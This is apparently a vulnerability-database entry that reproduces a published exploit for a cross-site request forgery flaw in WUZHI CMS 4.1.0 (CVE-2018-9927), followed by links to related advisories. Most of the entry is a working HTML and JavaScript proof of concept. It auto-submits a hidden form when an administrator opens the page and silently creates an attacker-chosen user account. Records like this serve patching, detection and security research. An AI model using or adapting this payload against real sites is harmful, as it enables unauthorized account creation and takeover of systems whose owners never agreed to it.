Lucene search
TaogePACKETSTORM:147141HistoryApr 11, 2018 - 12:00 a.m.
Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery
2018-04-1100:00:00
taoge
packetstormsecurity.com
33
EPSS
0.004
Percentile
73.8%
`# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9927
An issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";
fields += "<input type='hidden' name='info[email]' value='[email protected]' />";
fields += "<input type='hidden' name='info[mobile]' value='' />";
fields += "<input type='hidden' name='modelids[]' value='10' />";
fields += "<input type='hidden' name='info[groupid]' value='3' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='avatar' value='' />";
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />";
fields += "<input type='hidden' name='info[truename]' value='' />";
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
`
Related
exploitpack
exploitpack
WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)
2018-04-10 00:00:00
exploitdb
exploitdb
WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)
2018-04-10 00:00:00
nvd
nvd
CVE-2018-9927
2018-04-10 06:29:00
osv
osv
CVE-2018-9927
2018-04-10 06:29:00
cvelist
cvelist
CVE-2018-9927
2018-04-10 06:00:00
zdt
zdt
WUZHI CMS 4.1.0 - Add User Account Cross-Site Request Forgery Vulnerability
2018-04-11 00:00:00
prion
prion
Cross site request forgery (csrf)
2018-04-10 06:29:00
cve
cve
CVE-2018-9927
2018-04-10 06:29:00